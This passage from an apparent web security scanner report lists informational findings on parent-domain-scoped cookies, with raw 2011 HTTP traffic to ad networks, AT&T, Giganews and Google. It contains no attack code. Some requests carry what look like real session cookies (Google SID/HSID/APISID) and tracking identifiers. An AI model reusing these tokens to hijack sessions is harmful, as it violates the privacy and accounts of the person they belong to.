The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99?cb=1316239351&pet=preroll&pageUrl=newsinc.com&eov=eov HTTP/1.1
Host: u-ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: unique_ad_source_impression="20718%2C20716__TIME__2011-09-14+05%3A39%3A11"; asptvw1="as-2%2C1%2C2011-09-14%2F08-14-57"; adsrcvw1="27169%2C1%2C2011-09-15%2F07-14-57+c17252%2C1%2C2011-09-21%2F07-14-57+c17667%2C1%2C2011-09-15%2F05-45-56+27168%2C1%2C2011-09-15%2F05-39-11+c17253%2C1%2C2011-09-21%2F05-39-11"; creativeViews="{\"v\":1,\"views\":[{\"id\":9866,\"ts\":1316003951,\"cts\":null},{\"id\":9699,\"ts\":1316009697,\"cts\":null}]}"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"24\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"2\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"21\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"27\":{\"f\":1318575600,\"e\":1323759600,\"s\":[],\"a\":[]}}}"; rtbData0="key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true,key=turn:value=2944787775510337379:expiresAt=Wed+Sep+21+05%3A39%3A13+PDT+2011:32-Compatible=true,key=tidaltv:value=0fc5bd89-5ab4-4635-8ff8-18b58e6e3f77:expiresAt=Sun+Nov+13+06%3A14%3A58+PDT+2011:32-Compatible=true,key=dataxu:value=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F:expiresAt=Sun+Nov+13+06%3A15%3A00+PST+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-16+18%3A00%3A32"; marketTransaction="true__TIME__2011-09-14+05%3A39%3A04"; adaptv_page_url=oOt0lqLFswM_

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-16+18%3A01%3A07";Path=/;Domain=.adap.tv;Expires=Mon, 16-Sep-13 01:01:07 GMT
Content-Type: text/xml; charset=iso-8859-1
Set-Cookie: marketTransaction="true__TIME__2011-09-14+05%3A39%3A04";Path=/;Domain=.adap.tv;Expires=Fri, 14-Oct-11 12:39:03 GMT
Set-Cookie: adaptv_page_url=oOt0lqLFswM_;Path=/;Domain=.adap.tv
Content-Length: 104

<?xml version="1.0" encoding="UTF-8"?><VAST version="2.0"><error><![CDATA[Err code: 3]]></error></VAST>

11.190. http://usadmm.dotomi.com/dmm/servlet/dmm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dmm/servlet/dmm?rurl=http%3A//ads.dotomi.com/ads.php%3Fpid%3D18300%26mtg%3D0%26ms%3D18%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D728%26rheight%3D90%26pp%3D0%26cg%3D42%26tz%3D300&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000187%2C826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1986338424%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 01:48:36 GMT
X-Name: dmm-s01
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Mon, 16-Sep-2013 01:48:36 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 01:48:36 GMT; Path=/
Location: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
Content-Length: 0
Content-Type: text/plain


11.191. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@2@4e73f12f@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@3@4e73f151@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:01:05 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:01:05 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

11.192. http://vlog.leadforce1.com/bf/bf.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vlog.leadforce1.com
Path:   /bf/bf.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bf/bf.php?idsite=6304&url=http%3A%2F%2Fwww.mokafive.com%2FBetterWayVDI%3Fgclid%3DCLDCgauCo6sCFccaQgodS3zc1A&res=1920x1200&h=0&m=26&s=53&cookie=1&urlref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvirtual%2Bdesktop%23pq%3Dvdi%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D7%26gs_id%3Dw%26xhr%3Dt%26q%3Dvdi%2Bhosting%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3Dvdi%2Bhos%26aq%3D0%26aqi%3Dg1g-v3%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db659e1e8b520709%26biw%3D1087%26bih%3D870&rand=0.005555952433496714&pdf=1&qt=1&realp=0&wma=0&dir=0&fla=1&java=1&gears=0&ag=1&action_name=&title=VDI%20the%20way%20it%20should%20be%20%7C%20MokaFive&_lf1=&vt_=MWQ3NDI3NWUyZGE0MWM0N2NhN2YxYzlhNzA3NTQ4OTQ%3D HTTP/1.1
Host: vlog.leadforce1.com
Proxy-Connection: keep-alive
Referer: http://www.mokafive.com/BetterWayVDI?gclid=CLDCgauCo6sCFccaQgodS3zc1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lf1_visitor5577=8%3DMw%3D%3D%3A9%3Dd3d3LmFkb2JlLmNvbQ%3D%3D%3A10%3D%3A6%3DNzYxODQ0OTk%3D%3A7%3DMTMxNDc5NzYzMw%3D%3D%3A1%3DOWYxOWZkZGRhMGJkNTc3M2IzNTg3MzRkMmJjYjc1N2U%3D%3A2%3DMTMxNDc5NzYzMw%3D%3D%3A3%3DMTMxNDc5NzYzMw%3D%3D%3A4%3DNzYxODQ0OTk%3D%3A5%3DMjg5NjUzMQ%3D%3D%3A11%3DMA%3D%3D; lf1_visitor5860=1%3DMTkxMWI1MGFjZTFjYzQ4NDVkMzllYzc1NGExNTFmMGI%3D%3A2%3DMTMxNTQwMDE2Mg%3D%3D%3A3%3DMTMxNTQwMDEwOA%3D%3D%3A4%3DNzcwNTk3OTg%3D%3A5%3DMzEzNjk5Ng%3D%3D%3A11%3DMA%3D%3D; lf1_visitor5340=8%3DNA%3D%3D%3A9%3DR29vZ2xlIEFkcw%3D%3D%3A10%3Dc2VjdXJpdHk%3D%3A6%3DNzc1OTY0MTY%3D%3A7%3DMTMxNTc2MTE2MA%3D%3D%3A1%3DOWM1Njc4MjI0N2EyMmM0MDlmNzM1NDNmN2UxMDk0ZTk%3D%3A2%3DMTMxNTc2MTU5MA%3D%3D%3A3%3DMTMxNTc2MTE2MA%3D%3D%3A4%3DNzc1OTY0MTY%3D%3A5%3DMTgwMDQyMjg%3D%3A11%3DMA%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 17 Sep 2011 00:25:31 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: CP='OTI DSP COR NID STP UNI OTPa OUR'
Set-Cookie: lf1_visitor6304=8%3DNA%3D%3D%3A9%3DR29vZ2xlIEFkcw%3D%3D%3A10%3DdmlydHVhbCBkZXNrdG9w%3A6%3DNzg1OTUxNTA%3D%3A7%3DMTMxNjIxOTEzMA%3D%3D%3A1%3DOTQyZmEyOWM3MWU2N2M0YmViZDY0YzNhNDY1MzZkOWE%3D%3A2%3DMTMxNjIxOTEzMQ%3D%3D%3A3%3DMTMxNjIxOTEzMA%3D%3D%3A4%3DNzg1OTUxNTA%3D%3A5%3DMTgyMDgyODc%3D%3A11%3DMA%3D%3D; expires=Mon, 16-Sep-2013 00:25:31 GMT; domain=.leadforce1.com
Vary: Accept-Encoding
Content-Length: 43

GIF89a.............!.......,...........D..;

11.193. http://www.att.com/u-verse/availability/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /u-verse/availability/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /u-verse/availability/ HTTP/1.1
Host: www.att.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; DL3K=0; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d4421046-efa2-4b8f-86b0-7cdce9b8067a=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22YRv1CNCXi5e%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923713484570324388

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 125924
Date: Sat, 17 Sep 2011 01:51:52 GMT
Connection: close
Set-Cookie: TLTHID=9CE93778E0CF10E023F7DBFC78A4493E; Path=/; Domain=.att.com
Set-Cookie: B2CSESSIONID=DGhlTz9XhJykB9!-1935813224; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4200818379; path=/
Set-Cookie: DYN_USER_CONFIRM=a4f794fa32265f84a93d1ee3c2b94f36; path=/


                                                               
...[SNIP]...

11.194. http://www.bradsdeals.com/dealsoftheday/subscribe/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:34:39 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe t
...[SNIP]...

11.195. http://www.giganews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giganews.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?gclid=CMbM1MnAoqsCFQNggwod4mqsoA HTTP/1.1
Host: www.giganews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:15 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:31:15 GMT
Set-Cookie: engine_keywords=google%3Bnntp%20server; domain=.giganews.com; path=/
Vary: Accept-Encoding
Content-Length: 22201

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...

11.196. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giganews.com
Path:   /s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact?gclid=CMbM1MnAoqsCFQNggwod4mqsoA HTTP/1.1
Host: www.giganews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 16 Sep 2011 19:31:14 GMT
Server: Apache/2.0.54 (Fedora)
Location: /?gclid=CMbM1MnAoqsCFQNggwod4mqsoA
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 16 Sep 2011 19:31:14 GMT
Set-Cookie: paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; domain=.giganews.com; path=/; expires=Fri, 30-Sep-2011 19:31:14 GMT
Set-Cookie: paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; domain=.giganews.com; path=/
Set-Cookie: gac=; domain=.giganews.com; path=/; expires=Thu, 15-Sep-2011 19:31:14 GMT
Vary: Accept-Encoding
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="/?gclid=CMbM1MnAoqsCFQN
...[SNIP]...

11.197. http://www.google.com/sorry/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sorry/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/?continue=http://www.google.com/search%3Fs%3Fpq%3Dwindows%2Bvirtual%2Bdesktop%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D23%26gs_id%3D3v%26xhr%3Dt%26q%3Dwindows%2520virtual%2520desktop%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3D%26aq%3D%26aqi%3D%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2,or.r_gc.r_pw.%26biw%3D1087%26bih%3D870%26ech%3D2%26psi%3De-hzTu6UEazYiAKVrZS0Ag.1316237087043.6%26emsg%3DNCSR%26noj%3D1%26ei%3DlOhzTvesD4rliALP7emzAg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz

Response

HTTP/1.1 503 Service Unavailable
Set-Cookie: S=sorry=yriFazr4YzG_-3ugE2lAyg; path=/; domain=.google.com
Date: Sat, 17 Sep 2011 00:25:44 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3804
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>http://www.google.com/search?s?pq=windows+virtual
...[SNIP]...

11.198. http://www.google.com/sorry/Captcha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sorry/Captcha

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/Captcha?continue=http%3A%2F%2Fwww.google.com%2Fsearch%3Fs%3Fpq%3Dwindows%2Bvirtual%2Bdesktop%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D23%26gs_id%3D3v%26xhr%3Dt%26q%3Dwindows%2520virtual%2520desktop%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3D%26aq%3D%26aqi%3D%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2%2Cor.r_gc.r_pw.%26biw%3D1087%26bih%3D870%26ech%3D2%26psi%3De-hzTu6UEazYiAKVrZS0Ag.1316237087043.6%26emsg%3DNCSR%26noj%3D1%26ei%3DlOhzTvesD4rliALP7emzAg&id=12944662591677844831&captcha=marbi&submit=Submit HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/sorry/?continue=http://www.google.com/search%3Fs%3Fpq%3Dwindows%2Bvirtual%2Bdesktop%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D23%26gs_id%3D3v%26xhr%3Dt%26q%3Dwindows%2520virtual%2520desktop%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3D%26aq%3D%26aqi%3D%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2,or.r_gc.r_pw.%26biw%3D1087%26bih%3D870%26ech%3D2%26psi%3De-hzTu6UEazYiAKVrZS0Ag.1316237087043.6%26emsg%3DNCSR%26noj%3D1%26ei%3DlOhzTvesD4rliALP7emzAg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; S=sorry=yriFazr4YzG_-3ugE2lAyg

Response

HTTP/1.1 503 Service Unavailable
Set-Cookie: S=sorry=VHoVg_3qij9Moc_LhqQwIQ; path=/; domain=.google.com
Date: Sat, 17 Sep 2011 00:25:50 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3802
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>http://www.google.com/search?s?pq=windows+virtual
...[SNIP]...

11.199. http://www.nntpserver.com/gl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nntpserver.com
Path:   /gl/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gl/ HTTP/1.1
Host: www.nntpserver.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LastVisit=1316201507; expires=Sat, 15-Sep-2012 19:31:47 GMT; path=/; domain=.nntpserver.com
Set-Cookie: LastVisitTemp=deleted; expires=Thu, 16-Sep-2010 19:31:46 GMT; path=/; domain=.nntpserver.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


12. Cookie without HttpOnly flag set  previous  next
There are 271 instances of this issue:

Issue background

